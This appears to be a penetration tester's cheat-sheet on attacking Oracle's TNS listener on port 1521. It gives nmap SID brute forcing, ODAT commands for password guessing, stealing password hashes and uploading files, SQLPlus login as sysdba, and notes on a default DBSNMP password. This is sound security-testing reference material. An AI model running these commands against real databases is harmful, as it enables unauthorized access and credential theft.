TNS
Transparent Network Substrate (TNS) is a protocol owned and developed by Oracle. It's mainly used to manage Oracle Databases.
It includes performance monitoring and analysis, error reporting, and logging tools. It supports a wide range of networking protocols such as IPX/SPX, TCP/IP, IPV6, and SSL/TLS. Communications are encrypted.
ποΈ Port: 1521 (TCP)
The server-side service that listens for clients is called a listener. Its configuration determines which networking protocols are allowed.
TNS Pentester Notes β οΈ
List databases using brute force:
$ sudo nmap IP -p 1521 -sV --script oracle-sid-brute
Oracle Database Attacking Tool (1.5k β, ODAT, 2022 β οΈ) can be used to enumerate or exploit Oracle Databases.
$ sudo apt install odat
$ odat all -s IP
$ odat sidguesser -s IP
$ odat passwordguesser -s IP -d sid
$ odat passwordstealer -s IP -U username -P password -d sid --sysdba --get-passwords
$ odat utlfile [...] # file upload
π User may have sys dba access, try --sysdba
.
We can use Oracle SQLPlus to connect to the database:
$ sudo apt-get install oracle-instantclient-sqlplus
$ sudo updatedb
$ # if you got an error when running sqlplus
$ lpath=$(dirname `locate libsqlplus.so`) ; echo $lpath
$ sudo sh -c "echo $lpath > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig
$ # connect
$ sqlplus username/password@IP/sid
$ sqlplus username/password@IP/sid as sysdba
π User may have sys dba access, try as sysdba
.
π» To-do π»
Stuff that I found, but never read/used yet.
-
tnsnames.ora
(client-side infos, list of db/services configurations) -
listener.ora
(server-side config, listener config) -
$ORACLE_HOME/network/admin
folder - DBSNMP service has
dbsnmp
default password - Finger service?
- PL/SQL Exclusion List (PlsqlExclusionList)
- Remove Listener Management?